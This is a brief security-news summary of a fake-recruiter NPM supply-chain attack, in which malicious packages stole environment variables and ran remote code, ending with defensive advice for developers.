A developer was targeted by a fake employer on LinkedIn who distributed malware through a sophisticated NPM supply chain attack. The attacker posed as a CEO, offering a full-stack role, and directed the developer to a Bitbucket repository containing malicious packages like async-queuelite. The code was designed to steal environment variables and execute remote commands.

The attack unfolded over weeks, with the attacker repeatedly publishing new malicious packages after takedowns, including reqweaver and restpilot. The backdoor collected system info, exfiltrated data to a Vercel endpoint, and used eval() for remote code execution. This method bypasses static analysis tools, making it particularly dangerous for unsuspecting developers.

The incident underscores a growing trend where attackers blend social engineering with supply chain vulnerabilities. While the developer avoided running the code, the persistence of the attacker—shifting from NPM packages to embedded backdoors—highlights the need for caution when installing dependencies from unfamiliar sources. Reporting to NPM led to takedowns, but the threat remains active.

Developers should inspect unknown packages, use sandboxed environments, and validate unsolicited job offers. This case shows how targeted attacks can exploit the hiring process, turning a routine coding test into a security breach. Vigilance and proper vetting of dependencies are critical defenses against such evolving threats.